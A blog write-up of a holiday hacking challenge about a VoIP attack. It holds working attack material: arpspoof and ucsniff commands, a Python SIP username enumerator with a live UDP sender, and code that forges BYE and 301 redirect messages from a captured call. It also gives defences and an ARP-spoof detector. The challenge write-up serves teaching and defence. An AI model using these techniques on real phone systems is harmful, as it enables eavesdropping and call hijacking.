My Solution to The Nightmare Before Charlie Brown’s Christmas

4 01 2011

Merry Christmas and happy new year to you all 🙂 !! I spent some time during the new year festival tackling this problem. You can read the whole question here: The Nightmare Before Charlie Brown's Christmas by Ed Skoudis

My Proposed Solution:
1.) What was the purpose of Jack’s commands shown above?
Jack was searching for VoIP devices that speak SIP. First he obtained an IP address and, from it, the network address to use for the upcoming attack. He then used Metasploit and spotted the Asterisk PBX serving SIP at IP: , which was on the same subnet as Jack's laptop; the scan also told him which SIP methods the box supported. Having found the SIP proxy server, he gathered information by enumerating numeric usernames between 1000 and 1100, using the OPTIONS and REGISTER methods. The technique is known as enumerating SIP usernames with error messages: a REGISTER or INVITE request carrying a candidate username is sent to the SIP proxy server or registrar, and the status code of the reply reveals whether the account exists. A 401 response comes back for a valid username, because the registrar challenges it for credentials; for an invalid one the server answers with a 403.
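The enumeration logic described above, written out as an added example (it is not code from the challenge or from any tool named here). The proxy and scanner addresses, the account list and the fake registrar are constructed for the example; the only real-network piece is udp_send, which simply swaps in for the fake when pointed at a live registrar. Note that the 401/403 split only exists when the registrar leaks it: Asterisk with alwaysauthreject=yes answers 401 for unknown users too, and the classifier reports those runs as inconclusive rather than guessing.

```python
"""SIP username enumeration by REGISTER error code (added example)."""
import re
import socket

PROXY_HOST = "192.168.1.10"   # assumed address of the Asterisk PBX
LOCAL_HOST = "192.168.1.20"   # assumed address of the scanning laptop

def build_register(username, call_id, proxy_host=PROXY_HOST, local_host=LOCAL_HOST):
    """Build a minimal RFC 3261 REGISTER request for one numeric username."""
    return (
        f"REGISTER sip:{proxy_host} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP {local_host}:5060;branch=z9hG4bK{call_id}\r\n"
        f"From: <sip:{username}@{proxy_host}>;tag={call_id}\r\n"
        f"To: <sip:{username}@{proxy_host}>\r\n"
        f"Call-ID: {call_id}@{local_host}\r\n"
        "CSeq: 1 REGISTER\r\n"
        f"Contact: <sip:{username}@{local_host}:5060>\r\n"
        "Max-Forwards: 70\r\n"
        "Content-Length: 0\r\n\r\n"
    )

STATUS_RE = re.compile(r"^SIP/2\.0 (\d{3}) (.*)$")

def classify(response):
    """Turn the registrar's status line into a verdict on the probed name.

    401 = challenged, so the account exists; 403 = refused outright, so it
    does not. Anything else (404, timeout, alwaysauthreject-style 401 for
    everyone) is reported as unknown instead of being guessed at.
    """
    m = STATUS_RE.match(response.split("\r\n", 1)[0])
    if not m:
        return "unknown"
    code = int(m.group(1))
    return {401: "valid", 403: "invalid"}.get(code, "unknown")

def enumerate_users(send, start=1000, end=1100):
    """Probe numeric usernames start..end inclusive.

    `send` takes a request string and returns the raw reply ("" on timeout),
    so the same loop runs against the fake registrar below or a live one.
    """
    found = []
    for n in range(start, end + 1):
        reply = send(build_register(str(n), f"{n:08x}"))
        if classify(reply) == "valid":
            found.append(str(n))
    return found

def udp_send(request, host=PROXY_HOST, port=5060, timeout=1.0):
    """Real transport: one REGISTER over UDP, one reply (or "" on timeout)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(request.encode(), (host, port))
        return s.recv(4096).decode(errors="replace")
    except socket.timeout:
        return ""
    finally:
        s.close()

# Constructed stand-in for the PBX: replies the way an Asterisk without
# alwaysauthreject would, with 1002/1003/1005 as the only real accounts.
KNOWN_ACCOUNTS = {"1002", "1003", "1005"}

def fake_registrar(request):
    user = re.search(r"^To: <sip:(\d+)@", request, re.M).group(1)
    if user in KNOWN_ACCOUNTS:
        return ('SIP/2.0 401 Unauthorized\r\n'
                'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="abc"\r\n'
                'Content-Length: 0\r\n\r\n')
    return "SIP/2.0 403 Forbidden\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    print(enumerate_users(fake_registrar))   # ['1002', '1003', '1005']
```

Against a live target, call enumerate_users(udp_send) instead; if every probe comes back "valid" the registrar is almost certainly returning 401 unconditionally and the result means nothing.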

2.) What was Jack’s big plan?
Jack's big plan was to launch an infrastructure server impersonation attack: he needed his laptop to pass as the SIP proxy server and registrar. From that position he could listen to the conversations and masquerade as someone else in order to deceive the caller.

3.) What tools and techniques could Jack have used to implement the whole attack, particularly the ability to listen to conversations in real time, and to inject his message with precision? Please be specific and chronological.

Attacking Sequences
3.1 Packet #4524 Time: 2008-12-02 09:21:25
Jack ARP-spoofed the gateway so that he could masquerade as the SIP proxy server and registrar. After a second ARP spoof, this time against the real SIP proxy server, he was in a man-in-the-middle position between the two.
> arpspoof -t
> arpspoof -t

3.2 Packet # Time: 2008-12-02 09:22:09
After users 1002 and 1003 registered, 1003 sent an INVITE to 1002. From this point on Jack could listen to the whole conversation, for example with ucsniff in monitor mode.
> ucsniff -i eth0 -M

3.3 Packet #15514 Time: 2008-12-02 09:23:07
Jack injected a BYE message to user 1002, crafted to look as though the real SIP proxy server had sent it on behalf of user 1003; in fact Jack sent it himself. Tools that can inject SIP messages like this include SiVUS (from ; the original link is dead, but it can be downloaded from ) and SIPp.

3.4 Packet #15898 Time: 2008-12-02 09:23:58
User 1003 noticed there was no longer any response from user 1002 and sent a BYE to user 1002, but Jack intercepted it. When user 1003 re-dialed user 1002, the infrastructure server impersonation came into play: the status 301 Moved Permanently in the capture shows that user 1003's call was redirected to user 1005, which was Jack.
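The two injected messages from 3.3 and 3.4, built from a captured INVITE and its 200 OK, as an added example that is not part of the original write-up and not code from SiVUS or SIPp. The captured INVITE and 200 OK below are constructed, as are the addresses, Call-ID, tags and the "spoofed1" To-tag. What the example shows is what a spoofed in-dialog message has to get right: the BYE reuses the dialog's Call-ID, both tags and the next CSeq and is addressed to the callee's Contact, while the 301 copies the caller's Via/From/Call-ID/CSeq and points Contact at the attacker's extension.

```python
"""Crafting the injected SIP messages from a captured dialog (added example)."""

# Constructed capture: 1003's INVITE to 1002 and 1002's 200 OK as they would
# pass through the proxy at 192.168.1.10 (all addresses/IDs are assumptions).
INVITE = (
    "INVITE sip:1002@192.168.1.10 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.33:5060;branch=z9hG4bK776asdhds\r\n"
    'From: "1003" <sip:1003@192.168.1.10>;tag=1928301774\r\n'
    "To: <sip:1002@192.168.1.10>\r\n"
    "Call-ID: a84b4c76e66710@192.168.1.33\r\n"
    "CSeq: 1 INVITE\r\n"
    "Contact: <sip:1003@192.168.1.33:5060>\r\n"
    "Content-Length: 0\r\n\r\n"
)
OK_200 = (
    "SIP/2.0 200 OK\r\n"
    "Via: SIP/2.0/UDP 192.168.1.33:5060;branch=z9hG4bK776asdhds\r\n"
    'From: "1003" <sip:1003@192.168.1.10>;tag=1928301774\r\n'
    "To: <sip:1002@192.168.1.10>;tag=a6c85cf\r\n"
    "Call-ID: a84b4c76e66710@192.168.1.33\r\n"
    "CSeq: 1 INVITE\r\n"
    "Contact: <sip:1002@192.168.1.32:5060>\r\n"
    "Content-Length: 0\r\n\r\n"
)

def parse_sip(msg):
    """Split a SIP message into its start line and a lower-cased header dict.

    Only the first ':' separates name from value, so 'Via: ... :5060' survives.
    """
    lines = msg.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:          # empty line ends the header section
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def craft_301(invite, redirect_uri):
    """Answer the caller's INVITE as if the proxy said 'moved permanently'.

    A response echoes the request's Via, From, Call-ID and CSeq; the To header
    gains a tag (value assumed here); Contact tells the caller where to go.
    """
    _, h = parse_sip(invite)
    return ("SIP/2.0 301 Moved Permanently\r\n"
            f"Via: {h['via']}\r\n"
            f"From: {h['from']}\r\n"
            f"To: {h['to']};tag=spoofed1\r\n"
            f"Call-ID: {h['call-id']}\r\n"
            f"CSeq: {h['cseq']}\r\n"
            f"Contact: <{redirect_uri}>\r\n"
            "Content-Length: 0\r\n\r\n")

def craft_bye(invite, ok_200, proxy_host):
    """Build a BYE to the callee that looks like the caller's, sent via the proxy.

    In-dialog requests from the caller side keep the caller's From (with tag),
    the callee's To tag from the 200 OK, the same Call-ID, a higher CSeq, and
    are sent to the callee's Contact (the dialog's remote target).
    """
    _, inv = parse_sip(invite)
    _, ok = parse_sip(ok_200)
    callee_uri = ok["contact"].strip("<>")
    cseq_num = int(inv["cseq"].split()[0]) + 1
    return (f"BYE {callee_uri} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {proxy_host}:5060;branch=z9hG4bKbye1\r\n"
            f"From: {inv['from']}\r\n"
            f"To: {ok['to']}\r\n"
            f"Call-ID: {inv['call-id']}\r\n"
            f"CSeq: {cseq_num} BYE\r\n"
            "Max-Forwards: 70\r\n"
            "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    print(craft_bye(INVITE, OK_200, "192.168.1.10"))
    print(craft_301(INVITE, "sip:1005@192.168.1.10"))
```

Whether the callee accepts the BYE depends on exactly these fields matching its dialog state, which is why a MITM who sees the INVITE and 200 OK (as Jack did after the ARP spoof) can do it and a blind attacker cannot.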

4) How could Linus have defended the infrastructure against Jack’s tactics?
Linus needed to deploy encryption at both the signalling (session) layer and the media layer of the VoIP infrastructure. SIP over TLS should be used to protect the signalling between SIP user agents and the SIP proxy servers, with certificates issued by a certificate authority rather than self-signed ones, so that a laptop posing as the proxy cannot present a certificate the phones will accept. SRTP should be used as well, so that the media stream is encrypted and not just the signalling. In addition, Linus could deploy an IPS and, given the lesson he has just learned, take measures against ARP spoofing, since that is what put Jack in the middle in the first place.
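As an added example of the ARP-spoofing countermeasure (not code from the write-up or from any product), here is the core of an arpwatch-style check over a constructed log of ARP replies: it flags any IP whose MAC changes from the first binding seen, and any MAC that answers for more than one IP, which is exactly the pattern of one laptop claiming both the gateway and the SIP proxy. All addresses and timestamps are assumptions made up for the example.

```python
"""Detecting ARP spoofing from observed ARP replies (added example)."""
from collections import defaultdict

# Constructed ARP reply log: (time, sender IP, sender MAC). Mirrors the attack:
# genuine gateway and proxy first, then one laptop claiming both addresses.
ARP_REPLIES = [
    ("09:20:01", "192.168.1.1",  "00:11:22:33:44:01"),  # gateway, genuine
    ("09:20:02", "192.168.1.10", "00:11:22:33:44:10"),  # SIP proxy, genuine
    ("09:20:05", "192.168.1.20", "00:0c:29:aa:bb:cc"),  # attacker's laptop
    ("09:21:25", "192.168.1.1",  "00:0c:29:aa:bb:cc"),  # gateway now "is" the laptop
    ("09:21:25", "192.168.1.10", "00:0c:29:aa:bb:cc"),  # so is the proxy
    ("09:21:27", "192.168.1.1",  "00:0c:29:aa:bb:cc"),  # spoof repeated to keep caches poisoned
]

def detect_arp_spoof(replies, pinned=None):
    """Return (changes, multi_ip_macs).

    changes: (time, ip, old_mac, new_mac) whenever an IP's MAC differs from
             the binding on record. Learned bindings follow the change (as a
             plain arpwatch would); pinned ones never do, so every repeat of
             the spoof for a pinned address is reported.
    multi_ip_macs: MAC -> sorted list of IPs, for MACs that answered for more
             than one IP during the window.
    """
    pinned = dict(pinned or {})
    binding = dict(pinned)
    ips_by_mac = defaultdict(set)
    for ip, mac in pinned.items():
        ips_by_mac[mac].add(ip)
    changes = []
    for ts, ip, mac in replies:
        old = binding.get(ip)
        if old is None:
            binding[ip] = mac
        elif old != mac:
            changes.append((ts, ip, old, mac))
            if ip not in pinned:
                binding[ip] = mac
        ips_by_mac[mac].add(ip)
    multi = {m: sorted(ips) for m, ips in ips_by_mac.items() if len(ips) > 1}
    return changes, multi

if __name__ == "__main__":
    changes, multi = detect_arp_spoof(
        ARP_REPLIES, pinned={"192.168.1.1": "00:11:22:33:44:01"})
    for ts, ip, old, new in changes:
        print(f"{ts} {ip} changed {old} -> {new}")
    for mac, ips in multi.items():
        print(f"{mac} answers for {', '.join(ips)}")
```

Pinning the gateway and the PBX (the two addresses an attacker has to claim for this attack) is the practical setting: without it the detector accepts the poisoned binding as the new normal after one alert, and only fires again when the real host reappears.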

5) How can Linus set things right?

First, Linus should cut Jack off at the switch by moving Jack's port into an unused VLAN, so that his MAC address can no longer reach the VoIP segment. Then he needs to stop the VoIP service, clear the poisoned ARP entries on the gateway and on the SIP proxy server, and only then start the VoIP service again. For the longer term, Linus should follow the suggestions above to improve the VoIP infrastructure.

Thanks, Ed, for the questions. Another of my skills has been sharpened.


